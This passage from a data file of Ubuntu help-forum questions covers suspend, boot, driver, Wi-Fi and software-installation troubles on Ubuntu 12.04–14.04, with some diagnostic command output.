468101	troubles with suspend	i have some troubles with putting my pc in suspend mode . 1 . i ca n't put it to sleep completely it suspends current session and goes to the log-in screen , it makes all the screens black , but it does n't actually power down pc nor displays . 2 . no network after wake up after waking up from suspend the network connection is gone , and i ca n't re-enable it , so i have to reboot my machine . when i do ifconfig i can see that all interfaces are gone . only lo is present . 3 . wake up delay when it wakes up , it shows me a desktop background without any windows or icons . no keyboard or mouse interactions seems to work . after some time ( couple of minutes ) , everything appears back and seems to work fine apart from issues stated above . i think it is somehow related to running virtualbox virtual machines ( via vagrant ) . when i have no virtual machines running - i 'm not experiencing this issue . also , if i have a running machine i ca n't shutdown my pc completely . it just hangs in there trying to shutdown until i press a power button on it 's chasis . update # 1 : i 've generated log-files requested by @ xubu-tur . here 's the list of performed actions : logs cleared system shutdown system boot log in suspend wakeup log in ( no network , no delay ) system reboot system boot log in vagrant up ( virtual machine booted ) suspend wakeup ( no network , no delay ) logs saved here 's the actual logs : https : //gist.github.com/slavafomin/247b77c5886f2009e56b i have not encountered third issue this time . do n't know why though . please advise . update # 2 : i 've updated my linux kernel to the latest version : $ uname -r 3.13.0-24-generic thank you for suggestion ! but i still have the same issues ( # 1 & # 2 ) . i 'm using latest xubuntu 14.04 on asus p8p67 evo rev 3.0 desktop computer . by the way , when running windows 8.1 on the same machine ( dualboot ) i 'm not experiencing any of this issues . i will be glad to update my question with some diagnostic info on request . thank you !
468102	boot repair fails to recover grub after windows 7 installation	i 'm trying to get a functional dual-boot of ubuntu 14.04 and windows 7 home premium . i began with a working windows 7 , then created a partition for ubuntu . i thought i succeeded in installing ubuntu on that partition , but it appeared corrupted , so i reinstalled from the cd , choosing `` erase ubuntu 14.04 lts and reinstall '' . at that time , my entire disk was formatted and all 500gb of my hdd were given to the ubuntu partition , my windows 7 partition was entirely erased . at that point , i created a new partition for windows using gparted and installed windows 7 successfully in that partition . as expected , this erased the ubuntu grub bootloader , and my laptop now boots exclusively into windows . i 've tried a number of solutions from the live cd , including boot repair and attempting to run install-grub and update-grub . the boot repair paste is here : http : //paste.ubuntu.com/7476445 . i do n't know where to go from here ; i feel like i 've exhausted all of my options , and at this point what seemed to be a simple endeavor to dual-boot ended up with me over my head . if anyone could help or point me in the right direction , i would really appreciate it . thank you !
468108	how download in ubuntu with specific date ?	how can i download the contents of a website in ubuntu considering the the time they are uploaded for example from 2012 on ? ( for example with wget or ... ... )
468109	no audio through speakers but headphones work fine	1i recently bought a dell latitude e7440 laptop . it came with windows 7 preinstalled and eveything works fine with it . but i 'm planning to install ubuntu 14.04 on it and when i boot from a usb stick , i do n't get any audio and the multitouch of the touch pad does n't work . i have tried looking for drivers for them online and searched for people with similar issues , but i was unable to find a solution to the problem . i am doing all my experiments on the os on the usb stick and plan to install it once i am certain of the solutions . any help would be deeply appreciated . edit 1 : i installed it on my laptop . i have audio output from my headphones but none through my speakers . i see the value set to 00 in alsamixer for speaker but i am unable to change it . also , i tried reinstalling pulseaudio using the commands available online and also adding the generic type to the end of the file /etc/modprobe.d/alsa-base.conf . but nothing seems to work . edit 2 : okay this is crazy , but i read this suggestion here and it said close the lid and open it again . when i closed the lid ubuntu went to sleep and then when i logged in again , the internal speakers started working . also , the first time i installed ubuntu , it was in dual boot with windows 7 . i somehow screwed up the mbr and reinstalled ubuntu . when windows was not detected , the sound from internal speakers was coming . when i repaired the mbr , the sound was gone . that 's when i tried the lid trick . any idea what 's up ?
468112	undo close tab ( ctrl+shift+t ) not working	it is been some time that the undo close tab or ctrl+shift+t is not working and i am not able to recover even the tab i just closed . i have to manually open it again from history ! how this problem can be solved ?
468116	netbeans installation does n't work	while trying to install netbeans 8.0 in my ubuntu 14.04 i get the following error : can`t initialize ui running in headless mode exception : java.awt.headlessexception thrown from the uncaughtexceptionhandler in thread `` main '' i have previously installed openjdk 7 and yet it 's not working for some reason .
468119	problems installing lubuntu	i 'm trying to install lubuntu on a very old computer . because it ca n't to boot from usb or cd , i used lubuntu cd boot helper . when i restarted my computer , it gave me a choice to boot from either windows or lubuntu . when i chose lubuntu , it says : error : prefix is not set , and after a while it gives me a menu to choose from booting options . if i wait 5 seconds , it tries to boot by itself and then gives me an unknown error .
468125	can i recover firefox and tor bookmarks ?	i will be going back to windows , because after months of dealing with linux , i realized it 's not for me . in short , right now linux wo n't present the login screen . there are things i want to save before i format this hard drive with linux installed . i can explore this hard disk drive with a different os . i never exported either tor 's or firefox 's bookmarks , so i 'm hoping they are lying around somewhere in the ubuntu filesystem . is this the case ? i am assuming i can just take the tor bundle directory with me , use it in a linux virtual machine , and export it 's bookmarks , but what about firefox ? can i just take it 's directory with me someplace else ? if so , where is firefox installed ?
468126	how do i chroot an ssh user to their home directory ?	i do n't want to use jailkit . my os is ubuntu 14.04 . i am setting up a user account on my server for a kid i tutor , so he can run a minecraft server . he will be using putty to ssh into my server , and i want to limit his filesystem access to his home directory and basically give him free reign . he will need to be able to use bash , java , and nano , but i also want to give him access to python , lynx , and emacs , and maybe curl , wget , and git . it would be cool if i could limit the size of his home folder too . what do i need to do to make this happen ?
468127	how to get gmail-like labels in thunderbird	is there a way to get gmail labels shown in thunderbird properly ? that is , a label next to the subject .
468129	kde folder widget custom icon ?	i want to set a custom icon on my folder widget that i have on one of my panels . how if possible do i do this ? or is there a similar widget i can use that can do this , with shortcuts for specific launcher files ?
468132	why is it showing so big size of files ?	this is the screenshot of the properties of all files except /home : my whole hard disk is of ~320 gb , then how is it so big ?
468135	vlsub extension for vlc issue	on fresh ubuntu 14.04 install , with fresh install of vlc , the vlsub extension launch a windows when no file is open . once i open a movie , the extension does n't open the vlsub window . tried with the master-daily ppa , does n't work either . tried with vlsub-extension in the ppa . tried with manual install . always the same issue : the vlsub windows refuse to open once a movie is loaded . has anyone an idea to fix it ?
468137	screen keep splashing after installing ubuntu14.04 lts with intel xeon vga	os : ubuntu 14.04 lts vga info : lspci | grep vga 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) processor : intel i7 , 4 cores . i try to follow the guidence of http : //ubuntu-tutorials.com/2010/05/06/ubuntu-10-04-lucid-blank-screen-at-startup-workaround/ to fix this problem , but failed . i also tried to install the intel-linux-graphic-installer.deb to fix this problem , again , failed . any valuable insights here ? : ( thanks .
468141	newly created usb installation stick has 1 disc error ?	i just created a bootable usb stick following the instructions on the ubuntu site . now when i mount it , and select check for errors , it says one error is found . two thing : how is this even possible ? is this a problem ?
468145	touchscreen support in lxde in ubuntu and lubuntu	i have been running lxde under ubuntu 14.04 on a dell xps 13 for about a week now . i 'm loving it . anyway ... when running unity on by ubuntu 14.04 installation , i enjoy full touch-screen support . when running lxde on lubuntu 14.10-daily from a live-usb , i enjoy full touch-screen support . unfortunately , when running my favourite solution ( lxde on ubuntu 14.04 ) i have no touch-screen support . how do i enable it ?
468146	terminator does n't show system title bar	after i reboot my system for some updates , my terminator stopped showing the system tool bars ... anyone knows why ?
468150	open pdf in tar.gz without extracting	i have a tar.gz which have pdfs in it i want to open a specific pdf without extracting it is this possible using terminal through some command ( i know we can do it using gui but i want to use terminal )
468155	xubuntu 14.04 keyboard layout uk gb	i 've just updated my laptop to xubuntu 14.04 , and after the update my keyboard has changed to english-english ( us ) . this is ok for most keys , but it swaps @ with `` , and loses the pound sign ( the english currency one - not # ) . if i go to settings manager > hardware > keyboard , i can change the keyboard to english ( uk ) , but this seems to have no effect . a new icon appears on the top bar , and this appears now control keyboard layout . googling has led me to the ibus command and this seems to control this new system . however , the only gb english settings i get from ibus list-engine are : xkb : gb : dvorak : eng - english ( uk , dvorak ) xkb : gb : extd : eng - english ( uk , extended winkeys ) the dvorak one completely messes up my alphanumeric keys , the later has the same problems as the us layout . how do i get back to a bog standard english uk keyboard layout
468156	efi problem on macbook install	i 'm trying to put ubuntu-14.04-desktop-amd64+mac on a macbook5,2 model but right after booting into the usb , it gives the error : could not open `` \efi\boot\fallback.efi '' : 14 any ideas ? i 'm replacing a totally messed up os x with linux .
468158	14.04 wifi issue , reboot doesnt help	i am experiencing a bit strange issue right now , i made clear installation of 14.04 lts 2 days ago . i use broadcom bcm4313 with default brcmsmac driver ( i also tried wl driver , which worked well in 12.04 lts ) . i noticed a wifi bug when i suspend/resume , wifi simply stops working , so i do n't suspend anymore . weird thing is , when i reboot ( or shutdown ) , wifi connects succesfully , i can even ping google , but i can not browse web via browser ( tried chrome , firefox ) . only thing that helps is booting into another system ( 12.04 or win ) , then booting back into 14.04 . i am a bit newb so i have no idea what 's the real deal here . thanks
468160	grub broken after installed ubuntu on an usb	i have installed ubuntu on an usb stick being careful on installing the boot in the right media ( the usb ) but now the boot on my pc is broken , i do n't have the usual grub but only a minimal terminal . this is the output of boot-repair : http : //paste.ubuntu.com/7477283/ thank you very much for your help
468161	how can i make hot corners less sensitive ?	on unity desktop , i have enabled hot corners using . unity tweak tool . it 's just that they are too sensitive , i too often activate them by mistake . i could n't find an option to set a delay for it in the tool , is there any way to do that ? just an image of how i am left without that option
468162	what to do if upgrade fails	i am about to upgrade from 13.10 to 14.04 , but was concerned that the upgrade may overwrite some settings i have added to files , when i say i what i mean is a friend , as i 'm not good with this stuff : - ) i have plex running and a few other programmes that is the main reason i use ubuntu on my hp server . so , if when i upgrade and it 's overwritten these files , is there a way to restore to a previous state ? or , is there a way i can use the backup software to copy the whole drive , copy this elsewhere , and if it fails simply use that backup to stick everything where it came from ? thanks in advance .
468164	netbeans clipboard not working well	i installed netbeans 8.0 on ubuntu 14.04. and i have a problem - it seems like it `` does n't share clipboard '' with other applications . the thing is copy-paste works within netbeans ( i can copy the code from one file to another ) , but it does n't work between netbeans and other applications . so , if i want to copy something from my browser to netbeans , i ca n't do it . this happens only on 8.0 , earlier versions of netbeans do n't have that problem . does anybody know how to solve this ?
468165	is it possible to add edge resistance to compiz `` desktop wall '' edge flipping ?	example : i have four workspaces vertically , which i want to switch between by simply moving the cursor to the bottom or top part of the screen . but sometimes i want to click something in the bottom part of the screen , and i 'accidentally ' switch workspace instead . can i add edge resistance , like the 'reveal sensitivity ' in the launcher ? if this is n't a feature , how can i request it , or possibly write the code myself ? and if i will write the code , do you have any idea where i can get inspiration ( e.g . the launcher ) or should write the code ( e.g . which files in 'desktop wall ' )
468168	`` error : unknown option -d '' while simple query interception	i am working on mysql proxy using lua.so i am trying for simple query interception.using this link , i have done the following . i created a file example.lua , with the following code function read_query ( packet ) if string.byte ( packet ) == proxy.com_query then print ( `` hello world ! seen the query : `` .. string.sub ( packet , 2 ) ) end end after saving it i tried to start the proxy using the following command $ mysql-proxy -- proxy-lua-script=example.lua -d but i get the below error ( critical ) mysql-proxy-cli.c:502 : unknown option -d could anyone fix this issue . thanks in advance : )
468172	what is a good gui file renamer that takes files from command line uris ?	looking for a gui mass file renamer that can be run from a selection of files in nemo . nemo has a built-in placeholder for a mass rename tool so you can provide the name of the app to run to rename multiple files . the files selected are passed as uris on the command line . i have looked at pyrenamer , gprenamer and neither seem to accept a list of files from the command line . anyone know of any ?
468175	need direction to reach 'grub ' prompt	i am a newbie in ubuntu world . i am installing ubuntu 14.04 lta downloaded on 12-5-2014 . the .iso files has been checked for crc errors before burning dvd . there are some issues coming up while installing the ubuntu . i want to get into grub prompt and need to do some changes to clear the issues . my pc configuration is p4 3.06 ghz . 1 gb ddr-1 ram . a via chipset mobo and a 478 pin cpu . a blank 10 gb hdd completely dedicated to linux . monitor is lg studioworks crt with max resolution of 1024x768 . the entire pc is in good condition and works perfectly in xp . i have tried totally 4 versions of ubuntu 7.04 , 11.10 , 12.10 , 14.04lta . all .iso files are verified for crc errors and burned on dvd . out of which 7.04 was a success as it got installed without any glitches . but i need a latest version , so i have been trying the remaining versions but all of them are giving me 'out of frequency ' message before the monitor screen goes blank / stand by mode ( no signal from pc and the power light of pc button starts to blink ) , after which the installation continues and eventually stops after a minute or so . then i reset the pc and start allover again . follows here is a small essay of various screens that i encountered so that experts can give me guidance where exactly grub is / anything else . my pc gives 2 beeps after turning on . and i am pressing the relevent keys right after 1st beep . i have tried following methods a normal installation without touching any key . i came across 3 differnt screens that are decribed in documentation , it progresses furnther and then my pc gives ' out of frequeny ' message and the monitor goes to stand by mode . i have interrupted the normal installation in following recommended ways . pressing 'esc ' repetedly ( violently ! ! ! 2/3/4 times a second ) pressing left shift & keeping it pressed pressing right shift & keeping it pressed but i could't get grub prompt even once . on pressing 'esc ' repetedly i get a boot : prompt here i typed various commands but it accepts nothing . on pressing enter a small message flashes and installation continues . some times a colored screen with a icon at bottom / center of screen appears . if i press any key second screen having 4/5 menus appear as per documentataion it is 'ubuntu cd advanced welcome page options ' . here i have tried to enter few paramters after pressing f6 & the installation continues after this a screen with a text in the middle of the screen like 'ubuntu 14.04 ' and 4 dots in bottom of it . then my pc gives ' out of frequeny ' message and the monitor goes in stand by mode . if i press 'esc ' on 'ubuntu cd advanced welcome page options ' i get a message box as follows . 'you are leaving the graphical menu adn starting the text mode interface ' with ok and cancel button and it continues installation . and as i was fiddling with various key combination of keys i got a command prompt message ( a non graphical / textual message ) ' could n't find kernel image : gfxboot ' and the messge kept repeating on its own . this is the story so far , i have never seen any of the screens shown in the documentation of grub2 . all the screens that i have seen are from 'boot options ' page . this is the case with all of the 3 versions that i have tried except 7.04 . so there is fundamentally something wrong . i have followed all the steps recommende in the documentataion . as per my impression getting grub prompt should not be that difficult . experts need to tell me what is going wrong and how to reach grub prompt . only after that i can deal with ' out of frequency ' issue .
468178	kernel panic how to fix this error as below in image	using a desktop machine , while today morning power on the machine got this kernel panic error , after that restarted and tried to login in recovery mode too same issue repeating , how can i fix this issue
468179	ubuntu 14.04 splash	i want to change my ubuntu splash screen image or theme , when searching in google , i find some tutorial to change splash . first one is splash screen inside this folder ( /lib/plymouth/ ) , i can find it : ) the second one is images inside this folder ( /usr/share/images/usplash or /usr/share/images/xsplash ) , i ca n't find this folder , but i found this folder /usr/share/images/desktop-base . inside this folder there are some images file that contain 'splash ' in the name of the images . what should i do ?
468180	which is the more tested repository : backports or proposed ?	i 've read in at least three places that the `` backports '' repository is more tested ( and hence stable ) than the `` proposed '' repository . however , the official ubuntu webpages state : '' unsupported updates ( raring-backports ) '' ... packages may contain new features , may introduce new interfaces , and have not been sufficiently tested to be included in the 'proposed ' repository . this implies to me that packages firstly land in the `` backports '' repository . if they are then sufficiently tested , then they will move to the `` proposed '' repository . hence , `` proposed '' would appear to be more tested than `` backports '' . is this true , am i reading the official website wrong , or is this misinformation ?
468183	how to set time to `` keep synchronized with internet servers '' in lubuntu	i 'm having hard time making my lubuntu realise daylight savings has started . i was told to go to `` menu- > system tools- > time and date '' so that i can adjust my time zone and enable `` keep synchronized with internet servers '' . the thing is ; i ca n't find `` time and date '' under system tools !
468189	spamassassin plugin not working in evolution	i have followed various advice regarding the installation of the spamassassin plugin for evolution . it still wo n't appear under the list of plugins in evolution . i am running ubuntu 14.04 lts with evolution 13.10.4 . the examples i have used are : https : //help.ubuntu.com/community/howtoenablespamfilteringinevolution http : //gnome.eu.org/index.php/report_as_spam_ % 28rspam % 29_plugin both spamassassin and bogofilter were installed from the ubuntu repositories . maybe someone has had this problem as well and can enlighten me ... . the junk mail preference has the `` include remote test '' ticked , and all other junk mail related options are ticked .
468190	last update messup my keyring auto login , when applying changes unlock icon is backward in 13.10	in using 13.10 and last update messed up my auto login and when i go to account the unlock icon is backwards when locked i can change settings and viseversa but changes dont work on startup always asks for keyring password
468191	epson printer driver	i cant get my ubuntu 12.04 to recognise my epson all-in-one , wi-fi wp4545 printer . it seems to go through the motions of searching , finding the driver and asks for authentication , shows the install window and then freezes . i have un-installed the ubuntu system and re-installed but with the same results .
468198	will an upgrade of ubuntu to a new lts change ssh host key	i have recently upgraded my computer from ubuntu 12.04 to 14.04 lts ( in one step ) . after the upgrade , however , i got well-known warnings like @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ warning : possible dns spoofing detected ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ the ecdsa host key for xxxx has changed , , if i try to ssh into the computer from another linux computer . if i try to log into the the computer from mingw/windows , which the host/server has a stored public key of , the login was successful for a few seconds and then the ssh session froze . the network for the host/server is down for about a few hours to a day , during which time i ca n't even ping the server . but it went back online again after that . my question is : is it possible/normal that a lts upgrade like mine change the host key at all ? or is it more likely my computer is under man-in-the-middle-attack . how do i verify which is the case ? thanks . -- update -- to try to fix the problem , i restored an ubuntu 12.04 image that i made before the upgrade to 14.04 using fsarchive and a second ubuntu installation . i did the recover many times before and never had a problem . but this time , after the recovery , the restored ubuntu 12.04 would n't boot . i was left with a grub prompt . then , fixing grub , i used a liveusb to re-install grub ( chroot , grub-install /dev/sda etc ) . again , this fixes grub every time in the past but not this time . grub-install reports some error about `` flexnet '' using sector 32 . i finally fixed grub after googling , and finding two lines of command to backup and wipe out the mbr . i do n't know if anyone has had similar issue before . i never installed any software called flexnet on my windows dual boot or linux . and it happened only after i upgrade to 14.04 lts . is this a sign my computer was hacked ? after i fixed grub , i was able to upgrade again to 14.04 lts , without any issue so far .
468199	how to find system parts version numbers ?	libreoffice help recommends me to install a higher version of libreoffice than i can get from the ubuntu software center . i can do it by direct installing from *.deb files . i know most of required system properties , their versions are much higher than required . i hope that it applies also for the other ones , but the lower libreoffice version in the ubuntu software center may be due to such a discrepancy . if it is so , please answer this long question summarily . for installing i need to see if my ubuntu 12.04 system has gtk version 2.10.4 or higher [ according to how to know my gtk version ? i have got user @ cpu : ~ $ dpkg -- get-selections | grep gtk adobe-flash-properties-gtk install appmenu-gtk install appmenu-gtk3 install apport-gtk install bzr-gtk install gir1.2-dbusmenu-gtk-0.4 install gir1.2-gtk-2.0 install gir1.2-gtk-3.0 install gir1.2-gtksource-3.0 install gir1.2-javascriptcoregtk-3.0 install gtk2-engines install gtk2-engines-murrine install gtk3-engines-unico install ibus-gtk install ibus-gtk3 install jockey-gtk install libavahi-ui-gtk3-0 install libcanberra-gtk-module install libcanberra-gtk0 install libcanberra-gtk3-0 install libcanberra-gtk3-module install libdbusmenu-gtk3-4 install libdbusmenu-gtk4 install libgdu-gtk0 install libgtk-3-0 install libgtk-3-bin install libgtk-3-common install libgtk2-perl install libgtk2.0-0 install libgtk2.0-bin install libgtk2.0-common install libgtkhtml-4.0-0 install libgtkhtml-4.0-common install libgtkhtml-editor-4.0-0 install libgtkmm-2.4-1c2a install libgtkmm-3.0-1 install libgtksourceview-3.0-0 install libgtksourceview-3.0-common install libgtkspell-3-0 install libgwibber-gtk2 install libindicate-gtk3 install libjavascriptcoregtk-1.0-0 install libjavascriptcoregtk-3.0-0 install libnm-gtk-common install libnm-gtk0 install libreoffice-gtk install libswt-cairo-gtk-3-jni install libswt-glx-gtk-3-jni install libswt-gnome-gtk-3-jni install libswt-gtk-3-java install libswt-gtk-3-jni install libswt-webkit-gtk-3-jni install libwebkitgtk-1.0-0 install libwebkitgtk-1.0-common install libwebkitgtk-3.0-0 install libwebkitgtk-3.0-common install libwmf0.2-7-gtk install python-aptdaemon.gtk3widgets install python-gtk2 install software-properties-gtk install transmission-gtk install ubuntu-sso-client-gtk install usb-creator-gtk install xdg-user-dirs-gtk install user @ cpu : ~ $ ] ; glibc2 version 2.5 or higher [ user @ cpu : ~ $ dpkg -- get-selections | grep glibc2 user @ cpu : ~ $ ] ; gnome 2.16 or higher , with the gail 1.8.6 and the at-spi 1.7 packages ( required for support for assistive technology [ at ] tools ) , or another compatible gui ( such as kde , among others ) - [ by my system monitor : gnome 3.4.2 , user @ cpu : ~ $ dpkg -- get-selections | grep gail libgail-3-0 install libgail-common install libgail18 install user @ cpu : ~ $ user @ cpu : ~ $ dpkg -- get-selections | grep at-spi at-spi2-core install qt-at-spi install user @ cpu : ~ $ ] . which of the numbers are relevant for the particular part of my system ? if none , how to find the required ones ? is glibc2 relevant for the purpose ? 'a recent version of java runtime environment ( jre ) . how can i find which version is installed ? thanks !
468200	dual booting with windows 8.1 , what partitions should i create on hdd and ssd ?	i 've never used any os other than windows , but have decided to try ubuntu 14.04 . i have 30gb of free space on the ssd and 200gb on the hdd . now what partitions should i create ? i really have no idea how the file system in ubuntu works . i have been reading a lot and got a lot of conflicting information . in windows i use the ssd for the os and smaller programs and the hdd for bigger programs , games and other large files . i want to do it similarly for ubuntu . i also want to be able to exchange files between windows and ubuntu without them interfering . so obviously /root should go on the ssd , as that takes most advantage of the ssd 's speed ? how big should /root be ? i seem to also need a /home partition . where should i put that , if some of my programs should go on the ssd and some on the hdd ? is it possible to `` split '' /home between both ? or can i install programs outside of home ? if yes , what would the disadvantages of that be ? should i install programs on home at all or is it simply the ubuntu equivalent to windows ' appdata , and programs themselves should go somewhere completely different ? lastly , what about swap ? a lot of conflicting information on that . some say you do n't need it at all , some say it should be a fixed size , some say it needs to be more , the more ram you have . i have 8gb ram , which i almost never fully use and i do not plan on ever hibernating . so as i understand it , swap is basically a reserve for when your ram is all in use . what 's the worst thing that can happen , if i do n't have swap ? and why would it need to be larger if i have more ram ? should n't i need less `` reserve '' , if i already have more `` actual ram '' ? also , why do i need an extra partition anyway ? afaik windows simply uses a normal file pagefile.sys on the normal partition , which can easily be changed in size . what 's the advantage of having an extra partition ? also , if i do need swap , where should i put it ? some sources they it wears out the ssd much more quickly , others say that wo n't be a problem for over 20 years and swap benefits hugely from being on the ssd . sorry if my questions sound stupid , i 'm long-term windows user , who was just convinced to try ubuntu . thanks in advance for any help you can give a ubuntu beginner !
468201	how to launch .sh from third party program ?	i have the program lutris installed on my computer and i am going through adding all my linux games . however some are .sh execs others are .bins and executables which both added fine . the .sh ones are giving me some grief . i do n't know what to put in the argument section to help launch the game . it 's an easy fix i know it is . i just ca n't think of it , a little brain dead here : p -edit- i just threw sudo sh in there as something to see if it worked but it did n't . example : the games that are in .sh launch straight from the shell script file there are no install screens or anything i just run the terminal command and the game is open , lutris just simplifies that by adding them all together in a manager so i do n't have to type as much : p so if i do n't need an argument that is for after the program is launch do i need a preload library ? as lutris sees the file ( i think ) its supposed to be an executable that i just double click on the icon and the game starts . i can simplify this cause i know i am sometimes a little confusing with my words . lutris is a launcher for linux games and gaming on ubuntu in general . the games i have are .sh format , they are n't installers but launchers . i can go into terminal and type the sh commands and run the game fine , i am just trying to add said games to lutris and i guess lutris does n't see it as an executable even though i have it checked under permissions in the gui
468203	change location of log file for `` update-alternatives ''	i am currently managing my logging system but while setting all log location a problem occured : i want to change the location of the file /var/log/alternatives.log and i have done some research . this file is part of update-alterantives which changes default programs like the editor , ruby and other programs . after reading the manual pages i found out that you can set the log file with a parameter but if the system starts the program , i can not set this flag . i also did n't find a configuration file . how can i change the location of /var/log/alternatives.log permanently ?
468204	no panels or menus after upgrading to 14.04	i just upgraded my system to 14.04 . after restarting when the update was finished i did not see any menu bars or panels . right clicking and opening a terminal via ctrl+alt+t is not possible . however i can access the terminal via alt+f1 . i already tried out installing the unity-desktop again but it did n't change anything . do you have any suggestions ?
468205	video works with 'try me ' but not after install . what is the difference ? u12.04lts,	my hard drive got corrupted so i did a reinstall . tested youtube in ff during 'try me ' and it worked - jerky , but it worked . instal without all the updates ( 576 outstanding now ) in order to get ff installed as per the demo - to no avail . in 'try me ' mode ff never crashed ! after install ff crashed whilst i was typing in 'youtube ' in the address field . when i finally got to youtube - no video . what is the difference between ff in try me and ff after install ? off to try some selected updates now to see if i can see it for myself . in previous installation i had several profiles and aliased ff with -safe-mode switch to simplify startup of most stable ff . also found that ff startup in graphic mode worked better ( but still without video ) with all of the extensions disabled and all of the plugins set to `` ask '' and always denied ... i have sis graphic card in sis motherboard for xp and ancient hyundai imagequest qv770 monitor . i have ubuntu 12.04.01 lts 1 day after install with only the immediate upgrades requested to language pack ( english uk ) . using fr alternative keyboard . connected with domestic wifi network from orange ( ft ) i really want to use skype , but wo n't bother installing it ( again ) without video as i can do my sms on fb - whilst ff is not crashed ... update ... is something overflowing ? i have just had to reboot in order to get ff to restart in any way shape or form - restart on crash form generates new crash form , etc . it was however a good half hour before it crashed so some improvement over conditions before disk corruption . i have now installed all of the critical updates ( 332 recommended updates still outstanding ) which included some relating to ff . still no video . still crashing - especially when on grepolis website . since the re-install i have had a lovely 1024x768 screen , but after last ff crash and reboot i got a message about 'low graphics mode ' and 'setting things myself ' . i was not sufficiently tuned in at the time to take proper note - i have no doubt i shall see it again and shall report accordingly . i still have only laptop options for my screen and do not know how to rectify this . spent a few days with ubuntu on a different , newer machine which has now suffered a graphics breakdown . returned to this old one again , but with new flat screen monitor . found sis drivers for my graphics but it is intended for red hat 7.2 . i chose this over the version for 7.0 because i thought what the hell , i might not be able to do anything with either of them but this is the later one ... the file will not open with software manager - found a similar problem on overclock but it has not helped me to install this driver . file name is sis_drv.o-410 and it is currently idling away in my downloads folder ... i have tried the solution offered on another sis problem , but this shows that my xserver-xorg-video-sis driver is up to date . i am now at a loss as to how to proceed if i ca n't install the latest sis driver from sis ... does nobody know how ff changes from `` try-me '' to `` installed '' ? any time i must have video i reboot from the disk again , but this is tedious ! also one of the things i mock most about ms is the constant rebooting ... update 10/6/2014 i have installed chromium-browser - worse , crashes even more often than ff.i have installed epiphany - better ; video works but not the associated soundtrack.firefox is version 14.01 in 'try me ' and version 29.0 from my install . would it be useful to try to downgrade firefox in order to get video ? update 18/6/2014 the constantly crashing firefox has been solved ! ! hurrah ! ! used to have 1g+256m memory . upgraded to 1g+1g and after 4 hours firefox has not had one crash where i would have expected about 20 in the same time before ...
468207	full transparent ( glass type ) menu for ubuntu 14.04	is it possible to have menus like this concept design in ubuntu 14.04 ? with static blur like dash , launcher ?
468208	connected to a wifi network , but unable to access internet - freshly installed 14.01	i have a dell inspiron n5010 laptop and i have dual boot with windows 8.1 and ubuntu 14.04 . i had ubuntu 13.10 and now i installed 14.04 using live media ( i did not upgrade . ) now i am not able to access internet via wi-fi . it is connecting to wifi without any problem , but just internet does n't work . in windows 8.1 it works fine . i am able to access internet via usb serial modem , but not via wifi . here is few information that i am able to collect from laptop . user @ laptop : ~ $ cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04 lts '' linux machine 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux user @ laptop : ~ $ lspci -nnk | grep -ia2 net 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 [ 1028:0010 ] kernel driver in use : wl 13:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : dell device [ 1028:0447 ] kernel driver in use : r8169 user @ laptop : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off user @ laptop : ~ $ iwconfig ppp0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off user @ laptop : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no user @ laptop : ~ $ lsmod module size used by ppp_deflate 12950 0 bsd_comp 12921 0 ppp_async 17413 1 crc_ccitt 12707 1 ppp_async option 42468 3 usb_wwan 20429 1 option usbserial 45014 9 option , usb_wwan usb_storage 62209 0 bnep 19624 2 rfcomm 69160 8 joydev 17381 0 snd_hda_codec_hdmi 46207 1 snd_hda_codec_idt 54645 1 btusb 32412 0 bluetooth 395423 22 bnep , btusb , rfcomm hid_generic 12548 0 usbhid 52616 0 hid 106148 2 hid_generic , usbhid uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core dell_wmi 12761 0 sparse_keymap 13948 1 dell_wmi snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi dell_laptop 18168 0 dcdbas 14928 1 dell_laptop snd_rawmidi 30144 1 snd_seq_midi lib80211_crypt_tkip 17619 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi psmouse 102222 0 wl 4207846 0 intel_ips 18664 0 serio_raw 13462 0 i915 783485 8 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi lib80211 14381 2 wl , lib80211_crypt_tkip cfg80211 484040 1 wl lpc_ich 21080 0 snd_timer 29482 2 snd_pcm , snd_seq mei_me 18627 0 snd 69238 17 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_raw midi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi mei 82274 1 mei_me drm_kms_helper 52758 1 i915 soundcore 12680 